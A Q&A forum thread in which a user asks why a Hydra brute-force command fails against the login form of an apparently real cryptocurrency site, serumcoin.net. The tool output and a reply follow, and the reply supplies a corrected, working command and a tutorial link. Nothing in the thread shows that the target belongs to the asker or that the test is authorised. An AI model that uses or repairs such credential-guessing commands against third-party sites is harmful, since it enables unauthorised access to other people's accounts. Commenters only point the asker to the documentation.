# Every time this error coming why

Tags: hydra

```
sudo hydra -L /root/USERID.txt -p 'admin' 172.67.190.32 http-post-form '/https://serumcoin.net/signin:customerId=^USER^&password=^PASS^:Please check your customer Id and password combination'

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-18 13:06:21
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: //serumcoin.net/signin
```

Comment: This is situation where you need to look up the documentation to ensure that you got the command correct.

Comment: I’m voting to close this question because the answer is in the tool's documentation and provided examples

Answer (score 1):

You're writing the wrong command, the way it should work is:

```
sudo hydra -L /root/USERID.txt -p 'admin' 172.67.190.32 http-post-form '/signin:customerId=^USER^&password=^PASS^:Please check your customer Id and password combination'
```

The first parameter is where the login form is, so you don't need to give the entire url, only the endpoint which is "/signin" in this case.

I'll share a link with you with more information on how to brute-force an http-post-form in case you need it.

https://www.manrajbansal.com/post/how-to-use-hydra-to-brute-force-login-forms